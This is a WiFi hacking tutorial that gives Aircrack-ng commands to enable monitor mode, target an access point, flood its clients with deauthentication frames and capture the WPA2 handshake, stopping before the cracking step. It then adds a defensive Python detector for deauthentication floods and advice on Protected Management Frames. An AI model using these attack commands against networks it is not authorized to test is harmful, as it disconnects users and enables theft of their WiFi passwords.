Hack WPA2-PSK using Aircrack-ng
Aircrack-ng is a complete suite of tools to assess WiFi network security.
It focuses on different areas of WiFi security:
- Monitoring: Packet capture and export of data to text files for further processing by third party tools;
- Attacking: Replay attacks, deauthentication, fake access points and others via packet injection;
- Testing: Checking WiFi cards and driver capabilities (capture and injection);
- Cracking: WEP and WPA PSK (WPA 1 and 2). Official site.
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. Packages are released for Linux and Windows. Wikipedia.
Install Aircrack-ng using apt:
sudo apt install aircrack-ng -y
Switch wireless adapter in monitor mode:
sudo airmon-ng start wlan0
"wlan0" - name of the wireless adapter. After this command its name will change to wlan0mon.
Capture traffic with Airodump-ng:
sudo airodump-ng wlan0mon
Focus on target SSID:
sudo airodump-ng --bssid 00:00:00:00:00:00 -c 6 --write out_file wlan0mon
"00:00:00:00:00:00" - BSSID of target access point.
-c 6 - channel of access point.
"out_file" - output file name.
Send deauth command:
sudo aireplay-ng --deauth 100 -a 00:00:00:00:00:00 wlan0mon
100 - number of deauthentication frames.
Capture handshake.
In the previous step we dropped the user from their WiFi, and now, when they re-authenticate, airodump-ng will attempt to capture the new 4-way handshake, which depends on their password. Now open the airodump-ng terminal and check the top right side. You should see something like this:
WPA handshake: FF:FF:FF:FF:FF:FF
Now you need to decrypt the received WPA2 handshake.
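From the network owner's side, the burst of deauthentication frames sent in the "Send deauth command" step is the most visible trace of this procedure. The following is an added example, not code from the original post or from the Aircrack-ng project: it parses raw 802.11 management frames and flags a BSSID that receives an unusual number of deauthentication frames in a short window. The MAC addresses, timestamps, window and threshold are constructed assumptions, and frames are assumed to have the radiotap header already stripped.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12
BEACON_FC0 = 0x80  # management subtype 8, used here as benign background traffic

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(records, window=10.0, threshold=20):
    """records: time-ordered (timestamp, raw 802.11 frame without radiotap header).
    Returns [(bssid, time_of_first_alert, frames_in_window)]."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in records:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        bssid = parsed[2]
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:  # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = (ts, len(q))
    return [(b, t, n) for b, (t, n) in alerts.items()]

def sample_frame(fc0, dst, src, bssid, reason=7):
    """Build a constructed management frame (24-byte header + 2-byte body) for the demo."""
    h = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([fc0, 0, 0, 0]) + h(dst) + h(src) + h(bssid) + b"\x00\x00" + struct.pack("<H", reason)

AP, OTHER_AP, BCAST = "02:00:00:00:00:01", "02:00:00:00:00:02", "ff:ff:ff:ff:ff:ff"
# Constructed capture: 100 deauths for AP (mirroring the count used on this page),
# one ordinary deauth on another network, and beacons as background traffic.
SAMPLE = sorted(
    [(i * 0.125, sample_frame(DEAUTH_FC0, BCAST, AP, AP)) for i in range(100)]
    + [(3.0, sample_frame(DEAUTH_FC0, "02:00:00:00:00:99", OTHER_AP, OTHER_AP, reason=3))]
    + [(i * 1.0, sample_frame(BEACON_FC0, BCAST, OTHER_AP, OTHER_AP)) for i in range(12)]
)

if __name__ == "__main__":
    for bssid, ts, n in detect_floods(SAMPLE):
        print(f"deauth flood: bssid={bssid} first_alert={ts:.3f}s frames_in_window={n}")
```

Tune the window and threshold against normal roaming traffic on your own network before alerting on them. Enabling 802.11w Protected Management Frames on the access point and clients lets clients discard forged deauthentication frames.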